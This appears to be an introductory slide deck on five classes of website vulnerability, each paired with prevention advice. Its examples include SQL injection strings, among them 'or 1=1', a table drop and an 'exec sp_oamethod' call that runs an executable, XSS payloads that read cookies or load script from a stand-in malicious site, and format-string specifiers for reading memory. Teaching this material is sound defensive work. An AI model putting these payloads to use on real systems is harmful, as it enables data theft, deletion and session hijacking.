SECURITY VULNERABILITIES IN

WEBSITESby Brian Vees

Five Types of Vulnerabilities

SQL Injection Username Enumeration Cross Site Scripting (XSS) Remote Code Execution String Formatting Vulnerabilities

SQL Injection A very common, and easy to exploit

vulnerability Requires basic SQL knowledge

The basic idea: Find a user-inputted field that most likely is used to

query a database Insert text in the field which will then merge with the

SQL query being executed Examine the results to gain info about the database Using this info, write better queries to receive

potentially private data

SQL Injection - Example Given a sample login

prompt on a webpage:

Query to validate username might look like this:

Entering a single apostrophe “breaks out” of the intended SQL code, allowing other code to be executed

query = "select * from user where username='" + tbUserName.Text + "'";

SQL Injection – Example (Cont.) Entering this data

causes the followingquery to be sent to thedatabase:

Since 1=1 is always true, this query returns all users in the database

select * from user where username='' or 1=1 --'

Other Examples SQL injection to obtain error messages

containing useful data SQL injection to delete data

('drop [tablename]--) SQL injection to execute filesexec sp_oamethod @o, 'run', NULL, 'executable.exe'

SQL Injection Prevention “Escape” apostrophes String replacement on SQL-specific

character combinations (“--”) Safest: reject any bad input rather than

attempting to “cleanse” it Not necessarily plausible: names like O’Brien

and other valid input contain apostrophes

Username Enumeration A very simple method of finding valid

usernamesInvalid Username Valid Username

Username Enumeration Prevention

Use the same error message for invalid password and invalid username

This way an attacker has no idea whether or not the username is correct

Cross Site Scripting Another type of code injection, but with

client-side script Can be used to bypass client-side

security, as well as gain other information (session cookies)

Yahoo! and even Google have previously fallen victim to this vulnerability

XSS Example This form echoes what the

user entered in the case of an invalid login (i.e. invalid characters)

What if we input JavaScript?

Why Is XSS Dangerous? Consider if we now input the following code:

<script>alert(document.cookie)</script>

With this data, we can bypass cookie-based security

Also, external, lengthier scripts can be injected:<script src=“http://www.malicioussite.com/javascript.src”></script>

XSS Prevention User input cleansing Don’t echo user input back unless it is

necessary

Remote Code Execution Potentially the most dangerous

vulnerability Stems from unsecure settings on a web

server

Remote Code Execution Example

In PHP, the register_globals setting is often set to “on” to ease development

This allows for global variables to be set remotely

require($page . “.php”); If $page is not initialized, any arbitrary

file can be included and will be executed on that server

XML Vulnerabilities There are several XML specifications that

are also vulnerable to remote code execution

Improperly validated XML can “break out” of the XML, and execute malicious code

Remote Code Execution Prevention

Ensure web server configuration is secure (namely, if using PHP, turn register_globals off)

Validate user input

String Formatting Vulnerabilities

An attack on server-side functions that can perform formatting (such as C’s printf)

Special characters are used to read or write sections of memory that normally would not be accessible

String Formatting Example %s can be used to continue reading data

off the stack until an illegal memory address is attempted to be accessed, crashing the program

%x can be used to print areas of memory that are normally not accessible

%d, %u, and %x can be used to overwrite the instruction pointer, allowing the execution of user-defined code

String Formatting Vulnerability Prevention

Make sure and verify all user input Replace or reject special characters (“%”)

Conclusion What is the golden rule that will stop the

majority of these website attacks?

Validate User Input!